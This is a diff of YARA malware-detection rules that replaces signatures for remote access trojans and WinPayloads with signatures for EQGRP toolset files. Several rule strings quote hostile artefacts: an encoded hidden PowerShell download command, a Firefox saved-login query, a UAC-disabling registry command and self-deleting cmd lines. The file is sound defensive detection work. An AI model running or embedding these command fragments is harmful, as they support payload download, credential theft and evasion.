+		$s3 = "port undefined" fullword ascii
+		$s4 = "recv_ack: %s getmsg: %s" fullword ascii
+		$s5 = ">> %d -- %d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 3 of ( $s* ) and any of ( $v1_* ) ) or ( any of ( $serial0* ) ) or ( any of ( $opcodes* ) ) ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x457f and filesize < 40KB and 2 of them )
 }
-rule SIGNATURE_BASE_RAT_Shadowtech : FILE
+rule SIGNATURE_BASE_EQGRP_Teflonhandle : FILE
 {
 	meta:
-		description = "Detects ShadowTech RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "1fb15030-b400-5e70-b183-81e2527d5556"
-		date = "2014-01-04"
+		description = "Detects tool from EQGRP toolset - file teflonhandle.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4d82cc41-3777-5f8c-9392-aca69e6ed781"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/ShadowTech"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L819-L839"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L94-L111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8ab024ae5ca62de30daf4392db5241220fcdb9b419bad555a996729aed9fa45d"
+		logic_hash = "7dfa713b763c983219f008405e1ebf3dfe386672f2d4e5fb54b2b362023ae08a"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "ShadowTech" nocase
-		$b = "DownloadContainer"
-		$c = "MySettings"
-		$d = "System.Configuration"
-		$newline = "#-@NewLine@-#" wide
-		$split = "pSIL" wide
-		$key = "ESIL" wide
+		$s1 = "%s [infile] [outfile] /k 0x[%i character hex key] </g>" fullword ascii
+		$s2 = "File %s already exists.  Overwrite? (y/n) " fullword ascii
+		$s3 = "Random Key : 0x" fullword ascii
+		$s4 = "done (%i bytes written)." fullword ascii
+		$s5 = "%s --> %s..." fullword ascii
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and 2 of them
 }
-rule SIGNATURE_BASE_RAT_Smallnet
+rule SIGNATURE_BASE_EQGRP_False : FILE
 {
 	meta:
-		description = "Detects SmallNet RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "aec1f8fd-2806-527e-9d50-422f212864de"
-		date = "2014-01-04"
+		description = "Detects tool from EQGRP toolset - file false.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3a68790b-38fc-570b-8b19-c5478cdd2842"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/SmallNet"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L841-L861"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L113-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "17a6be371ce0c616cfea0b42a30e6d9118376912002d59790b133c73fd5436a3"
+		logic_hash = "a1938bc7a5a7a1bb382c2bab976013a1adedc045e0312daabe1bdcdd65d0c606"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$split1 = "!!<3SAFIA<3!!"
-		$split2 = "!!ElMattadorDz!!"
-		$a1 = "stub_2.Properties"
-		$a2 = "stub.exe" wide
-		$a3 = "get_CurrentDomain"
+		$s1 = { 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
+			00 25 6C 75 2E 25 6C 75 2E 25 6C 75 2E 25 6C 75
+			00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
+			00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
+			00 25 32 2E 32 58 20 00 00 0A 00 00 00 25 64 20
+			2D 20 25 64 20 25 64 0A 00 25 64 0A 00 25 64 2E
+			0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E
+			0A 00 00 00 00 25 64 20 2D 20 25 64 0A 00 00 00
+			00 25 64 20 2D 20 25 64 }
 
 	condition:
-		($split1 or $split2 ) and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and $s1
 }
-rule SIGNATURE_BASE_RAT_Spygate
+rule SIGNATURE_BASE_EQGRP_Dn_1_0_2_1 : FILE
 {
 	meta:
-		description = "Detects SpyGate RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "ed015770-81ff-5d9c-8bd0-3c225e400724"
-		date = "2014-01-04"
+		description = "Detects tool from EQGRP toolset - file dn.1.0.2.1.linux"
+		author = "Florian Roth (Nextron Systems)"
+		id = "24b5fb51-2463-56ef-818a-949b4b3bbf5b"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/SpyGate"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L863-L890"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L136-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5b891212f3a669c6066cfddef418faafd75c92bb2f1e8e1f48403422a73bc9fa"
+		logic_hash = "9b6420401419b280f01f7fc73412386a19e94a57e589a043b231b6a721585c99"
 		score = 75
-		quality = 83
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$split = "abccba"
-		$a1 = "abccbaSpyGateRATabccba"
-		$a2 = "StubX.pdb"
-		$a3 = "abccbaDanabccb"
-		$b1 = "monikerString" nocase
-		$b2 = "virustotal1"
-		$b3 = "get_CurrentDomain"
-		$c1 = "shutdowncomputer" wide
-		$c2 = "shutdown -r -t 00" wide
-		$c3 = "set cdaudio door closed" wide
-		$c4 = "FileManagerSplit" wide
-		$c5 = "Chating With >> [~Hacker~]" wide
+		$s1 = "Valid commands are: SMAC, DMAC, INT, PACK, DONE, GO" fullword ascii
+		$s2 = "invalid format suggest DMAC=00:00:00:00:00:00" fullword ascii
+		$s3 = "SMAC=%02x:%02x:%02x:%02x:%02x:%02x" fullword ascii
+		$s4 = "Not everything is set yet" fullword ascii
 
 	condition:
-		( all of ( $a* ) and #split > 40 ) or ( all of ( $b* ) and #split > 10 ) or ( all of ( $c* ) )
+		( uint16( 0 ) == 0x457f and filesize < 30KB and 2 of them )
 }
-rule SIGNATURE_BASE_RAT_Sub7Nation
+rule SIGNATURE_BASE_EQGRP_Morel : FILE
 {
 	meta:
-		description = "Detects Sub7Nation RAT"
-		author = "Kevin Breen <kevin@techanarchy.net> (slightly modified by Florian Roth to improve performance)"
-		id = "4f41d649-4a90-566b-bda8-0a288380aeaa"
-		date = "2014-01-04"
+		description = "Detects tool from EQGRP toolset - file morel.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e741b727-0e41-53d0-832c-df7f4ea7964a"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Sub7Nation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L892-L913"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L154-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bd6c423cd5cb5a86b20e5e65ab460904548b8814c92ac65e497757bb79a27681"
+		logic_hash = "463d628bb19e27e94dcccc4c7d435d86111d51aa9f77c5ca1a199d9aaa9017ba"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a9152e67f507c9a179bb8478b58e5c71c444a5a39ae3082e04820a0613cd6d9f"
 
 	strings:
-		$a = "EnableLUA /t REG_DWORD /d 0 /f"
-		$i = "HostSettings"
-		$verSpecific1 = "sevane.tmp"
-		$verSpecific2 = "cmd_.bat"
-		$verSpecific3 = "a2b7c3d7e4"
-		$verSpecific4 = "cmd.dll"
+		$s1 = "%d - %d, %d" fullword ascii
+		$s2 = "%d - %lu.%lu %d.%lu" fullword ascii
+		$s3 = "%d - %d %d" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them )
 }
-rule SIGNATURE_BASE_RAT_Vertex
+rule SIGNATURE_BASE_EQGRP_Bc_Parser : FILE
 {
 	meta:
-		description = "Detects Vertex RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "f6f5967e-6b88-5d95-8fe1-a286ee8ce64c"
-		date = "2014-01-04"
+		description = "Detects tool from EQGRP toolset - file bc-parser"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ed4523de-b126-503a-83bd-aafd8533b0e5"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Vertex"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L915-L938"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L172-L187"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c9fb0dedd97240ad29924865118ba34f5d79dbefbb13729d96d41336ec4de39e"
+		logic_hash = "e8911acc1173e1149fd11dd795b72ba26bc654cbc7f9d95053ce420663fcafe9"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "879f2f1ae5d18a3a5310aeeafec22484607649644e5ecb7d8a72f0877ac19cee"
 
 	strings:
-		$string1 = "DEFPATH"
-		$string2 = "HKNAME"
-		$string3 = "HPORT"
-		$string4 = "INSTALL"
-		$string5 = "IPATH"
-		$string6 = "MUTEX"
-		$res1 = "PANELPATH"
-		$res2 = "ROOTURL"
+		$s1 = "*** Target may be susceptible to FALSEMOREL      ***" fullword ascii
+		$s2 = "*** Target is susceptible to FALSEMOREL          ***" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x457f and 1 of them
 }
-rule SIGNATURE_BASE_RAT_Virusrat
+rule SIGNATURE_BASE_EQGRP_1212 : FILE
 {
 	meta:
-		description = "Detects VirusRAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "ef00cec9-d09b-5010-8e7d-bb391c937f34"
-		date = "2014-01-04"
+		description = "Detects tool from EQGRP toolset - file 1212.pl"
+		author = "Florian Roth (Nextron Systems)"
+		id = "428fed4f-df5c-5fc2-ac4b-4dea69ea4f2d"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/VirusRat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L940-L967"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L189-L207"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8540296fe1341a793377494cec9ba6ee0313203bee9997f0da0b692959727c59"
+		logic_hash = "1be7ed8fdfaecc6e55c4d1e75cf841f4620df3d2abe6aed2761aed20c42f70bd"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$string0 = "virustotal"
-		$string1 = "virusscan"
-		$string2 = "abccba"
-		$string3 = "pronoip"
-		$string4 = "streamWebcam"
-		$string5 = "DOMAIN_PASSWORD"
-		$string6 = "Stub.Form1.resources"
-		$string7 = "ftp://{0}@{1}" wide
-		$string8 = "SELECT * FROM moz_logins" wide
-		$string9 = "SELECT * FROM moz_disabledHosts" wide
-		$string10 = "DynDNS\\Updater\\config.dyndns" wide
-		$string11 = "|BawaneH|" wide
+		$s1 = "if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))" fullword ascii
+		$s2 = "$ans=\"$srcip:$srcport -> $dstip:$dstport\";" fullword ascii
+		$s3 = "return \"ERROR:$line is not a valid port\";" fullword ascii
+		$s4 = "$dstport=hextoPort($dstport);" fullword ascii
+		$s5 = "sub hextoPort" fullword ascii
+		$s6 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii
 
 	condition:
-		all of them
+		filesize < 6KB and 4 of them
 }
-rule SIGNATURE_BASE_RAT_Xtreme
+rule SIGNATURE_BASE_EQGRP_1212_Dehex : FILE
 {
 	meta:
-		description = "Detects Xtreme RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "02b7bb6a-5d1e-5379-b366-868680844719"
-		date = "2014-01-04"
+		description = "Detects tool from EQGRP toolset - from files 1212.pl, dehex.pl"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2cc375e6-2bff-5623-b86c-a6413f736c42"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Xtreme"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L969-L990"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L209-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4dec8de6609f8229444291a78e920ac48b9b5751dd0cad7c95bc6529d6f8c16c"
+		logic_hash = "74d1b0e820696cd5507996996bead50d283e83095bc7288a6e8e484738b6348b"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
-		ver = "2.9, 3.1, 3.2, 3.5"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "XTREME" wide
-		$b = "ServerStarted" wide
-		$c = "XtremeKeylogger" wide
-		$d = "x.html" wide
-		$e = "Xtreme RAT" wide
+		$s1 = "return \"ERROR:$line is not a valid address\";" fullword ascii
+		$s2 = "print \"ERROR: the filename or hex representation needs to be one argument try using \\\"'s\\n\";" fullword ascii
+		$s3 = "push(@octets,$byte_table{$tempi});" fullword ascii
+		$s4 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii
+		$s5 = "print hextoIP($ARGV[0]);" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x2123 and filesize < 6KB and ( 5 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_RAT_Adwind
+rule SIGNATURE_BASE_Install_Get_Persistent_Filenames : FILE
 {
 	meta:
-		description = "Detects Adwind RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "95681c07-0e9c-5688-a8a0-899617521c7b"
-		date = "2014-01-04"
+		description = "EQGRP Toolset Firewall - file install_get_persistent_filenames"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cf74b479-4b78-537a-878c-2f3ce004b775"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/adWind"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L992-L1011"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L237-L250"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "11167b927fa06324950753c6ec8f28058f2aa66fb4ecdf66a21de11a8db190b8"
+		logic_hash = "be07e3e3e96dd4676a76b32eb8fc47b2ab1f66ebbd6c2a3f1c88fc224f9f39ef"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4a50ec4bf42087e932e9e67e0ea4c09e52a475d351981bb4c9851fda02b35291"
 
 	strings:
-		$meta = "META-INF"
-		$conf = "config.xml"
-		$a = "Adwind.class"
-		$b = "Principal.adwind"
+		$s1 = "Generates the persistence file name and prints it out." fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x457f and all of them )
 }
-rule SIGNATURE_BASE_RAT_Njrat
+rule SIGNATURE_BASE_EQGRP_Create_Dns_Injection
 {
 	meta:
-		description = "Detects njRAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "6289b9c8-eef6-5cfb-97bd-b819158d6fdd"
-		date = "2014-01-04"
+		description = "EQGRP Toolset Firewall - file create_dns_injection.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ef358ca6-ebd8-5d08-944b-f1fcd112f1f3"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/njRat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L1013-L1036"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L252-L266"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "47e8cc71caaefd70a170eb8fc845cb7ddb8df04b90163fe35f1ccb9a3f614c57"
+		logic_hash = "a07cb33c459208410b326fc260e96e617385ee4eac905a92d9542cb5ec73713e"
 		score = 75
 		quality = 85
 		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "488f3cc21db0688d09e13eb85a197a1d37902612c3e302132c84e07bc42b1c32"
 
 	strings:
-		$s1 = {7C 00 27 00 7C 00 27 00 7C}
-		$s2 = "netsh firewall add allowedprogram" wide
-		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s4 = "yyyy-MM-dd" wide
-		$v1 = "cmd.exe /k ping 0 & del" wide
-		$v2 = "cmd.exe /c ping 127.0.0.1 & del" wide
-		$v3 = "cmd.exe /c ping 0 -n 2 & del" wide
+		$s1 = "Name:   A hostname: 'host.network.com', a decimal numeric offset within" fullword ascii
+		$s2 = " www.badguy.net,CNAME,1800,host.badguy.net \\\\" ascii
 
 	condition:
-		all of ( $s* ) and any of ( $v* )
+		1 of them
 }
-rule SIGNATURE_BASE_RAT_Unrecom
+rule SIGNATURE_BASE_EQGRP_Screamingplow
 {
 	meta:
-		description = "Detects unrecom RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "56b11c22-f43c-5192-9a0a-0ac14b0cd041"
-		date = "2014-01-04"
+		description = "EQGRP Toolset Firewall - file screamingplow.sh"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cb535ef0-e3ea-54cc-9082-3d63cc96d93a"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/unrecom"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L1038-L1058"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L268-L282"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "15ab9ee2f3fd825e91813a185bc5c7d7e790de39cd3e88c375b801d1412a08f4"
+		logic_hash = "429ff81b6079785cc45d81b5ebf8bccd49f30484ca692017b0b66484463606d4"
 		score = 75
 		quality = 85
 		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c7f4104c4607a03a1d27c832e1ebfc6ab252a27a1709015b5f1617b534f0090a"
 
 	strings:
-		$meta = "META-INF"
-		$conf = "load/ID"
-		$a = "load/JarMain.class"
-		$b = "load/MANIFEST.MF"
-		$c = "plugins/UnrecomServer.class"
+		$s1 = "What is the name of your PBD:" fullword ascii
+		$s2 = "You are now ready for a ScreamPlow" fullword ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_JRAT_Oct18_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Mixtext
 {
 	meta:
-		description = "Detects JRAT malware"
+		description = "EQGRP Toolset Firewall - file MixText.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f211ef1c-8def-55f0-8817-d01ebd9c2947"
-		date = "2018-10-11"
+		id = "99b06100-8a05-5c22-8b7d-ed451d5f4e81"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L1060-L1072"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L284-L297"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7c652f3943ae7639633b82663f639adb7dea1bae9e617a14710fb6e448cfdbee"
+		logic_hash = "cae2437124ad6e69b04a1338b651e33c7358b7fedd0613f3fa1025cf980e14ab"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e4d24e30e6cc3a0aa0032dbbd2b68c60bac216bef524eaf56296430aa05b3795"
 
 	strings:
-		$x1 = "/JRat.class" ascii
+		$s1 = "BinStore enabled implants." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 700KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_BACKORDER_LOADER_WIN_Go_Jan23 : LOADER GOLANG BACKORDER MALWARE WINDOWS FILE
+rule SIGNATURE_BASE_EQGRP_Tunnel_State_Reader
 {
 	meta:
-		description = "Detects the BACKORDER loader compiled in GO which download and executes a second stage payload from a remote server."
-		author = "Arda Buyukkaya (modified by Florian Roth)"
-		id = "90a82f2c-be92-5d0b-b47e-f47db2b15867"
-		date = "2025-01-23"
-		modified = "2025-03-20"
-		reference = "EclecticIQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_win_go_backorder_loader.yar#L1-L31"
+		description = "EQGRP Toolset Firewall - file tunnel_state_reader"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e48c9482-eae5-5c34-b7b2-502d0252f4a0"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L299-L313"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "70c91ffdc866920a634b31bf4a070fb3c3f947fc9de22b783d6f47a097fec2d8"
-		logic_hash = "9e79ec9e58e02b7660383ff20957b95bc3c61ed3badc9af3d5829ebe5bf6bd7b"
-		score = 80
+		logic_hash = "d0653650aad10e7ff69b7ef1e61fac64310c63cc68c6d924655f082925e4fd04"
+		score = 75
 		quality = 85
-		tags = "LOADER, GOLANG, BACKORDER, MALWARE, WINDOWS, FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "49d48ca1ec741f462fde80da68b64dfa5090855647520d29e345ef563113616c"
 
 	strings:
-		$GoBuildId = "Go build" ascii
-		$x_DebugSymbol_1 = "C:/updatescheck/main.go"
-		$x_DebugSymbol_2 = "C:/Users/IEUser/Desktop/Majestic/"
-		$s_FunctionName_1 = "main.getUpdates.func"
-		$s_FunctionName_2 = "main.obt_zip"
-		$s_FunctionName_3 = "main.obtener_zip"
-		$s_FunctionName_4 = "main.get_zip"
-		$s_FunctionName_5 = "main.show_pr0gressbar"
-		$s_FunctionName_6 = "main.pr0cess"
+		$s1 = "Active connections will be maintained for this tunnel. Timeout:" fullword ascii
+		$s5 = "%s: compatible with BLATSTING version 1.2" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10MB and $GoBuildId and ( 1 of ( $x* ) or 3 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Winpayloads_Powershell : FILE
+rule SIGNATURE_BASE_EQGRP_Payload
 {
 	meta:
-		description = "Detects WinPayloads PowerShell Payload"
+		description = "EQGRP Toolset Firewall - file payload.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b6b8823-4656-5b0d-9a1e-84045287f5bf"
-		date = "2017-07-11"
+		id = "949cb68b-e384-578c-a906-a4d9234dc668"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://github.com/nccgroup/Winpayloads"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winpayloads.yar#L12-L28"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L315-L329"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e9e75f7190327f08c5e204977c6714c93951a6db0ddf000c8b37db37131b9def"
+		logic_hash = "22e2a4809f6646437ab0824238fec791f3760ac305f9c818089797b011425b3d"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "011eba8f18b66634f6eb47527b4ceddac2ae615d6861f89a35dbb9fc591cae8e"
+		hash1 = "21bed6d699b1fbde74cbcec93575c9694d5bea832cd191f59eb3e4140e5c5e07"
 
 	strings:
-		$x1 = "$Base64Cert = 'MIIJeQIBAzCCCT8GCSqGSIb3DQEHAaCCCTAEggksMIIJKDCCA98GCSqGSIb3DQEHBqCCA9AwggPMAgEAMIIDxQYJKoZIhvcNAQcBMBwGCiqGSIb3D" ascii
-		$x2 = "powershell -w hidden -noni -enc SQBF" fullword ascii nocase
-		$x3 = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwA" ascii
-		$x4 = "powershell.exe -WindowStyle Hidden -enc JABjAGwAaQBlAG4AdAA" ascii
+		$s1 = "can't find target version module!" fullword ascii
+		$s2 = "class Payload:" fullword ascii
 
 	condition:
-		filesize < 10KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Winpayloads_Payload : FILE
+rule SIGNATURE_BASE_EQGRP_Eligiblecandidate
 {
 	meta:
-		description = "Detects WinPayloads Payload"
+		description = "EQGRP Toolset Firewall - file eligiblecandidate.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "44fae324-1fc8-5417-950a-8a3783b6d2ae"
-		date = "2017-07-11"
+		id = "e084b051-4aa1-54b2-9f56-69db386b46d6"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://github.com/nccgroup/Winpayloads"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winpayloads.yar#L30-L50"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L331-L348"
